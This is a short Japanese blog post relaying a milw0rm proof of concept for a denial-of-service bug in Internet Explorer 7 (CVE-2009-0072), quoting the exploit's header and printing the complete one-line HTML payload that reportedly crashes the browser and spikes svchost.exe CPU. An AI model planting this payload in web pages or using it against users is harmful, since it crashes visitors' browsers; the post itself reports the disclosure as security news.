MS Internet Explorer JavaScript screen[ ] Denial of Service Exploit(情報元のブックマーク数)

IT セキュリティ

IE7で悪意のあるページを開くと、svchost.exeにCPUが100%になる問題のPoCが出ています。

########################################################################################
#svchost.exe CPU usage boils up to almost 100 percent when we open the malicious
#webpage and IE7 (Version 7.0.5730.13) closes with all tabs.
#
#Tested On:
# Microsoft(R) Windows(R) Server 2003, Standard Edition with Service Pack 2
#
#With:
# IE Version 7.0.5730.13
#
# I didn't use Javascript anywhere in the HTML below. It might be the background
# processing of "onload" NULL pointer by IE which leads to the cra$$$hhhhh!!!
#
#Reference:
# http://xforce.iss.net/xforce/xfdb/47788
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0072
#
#########################################################################################
#########Thanx 2 str0ke, milw0rm, SkyLined and all Security folks !!!####################
#########################################################################################

http://www.milw0rm.com/exploits/7710

たったこれだけ?!

<html>

<title>MS IE 'screen[""]' Remote Denial of Service Vulnerability</title>

<body onload=screen[""]>

</html>

screenshot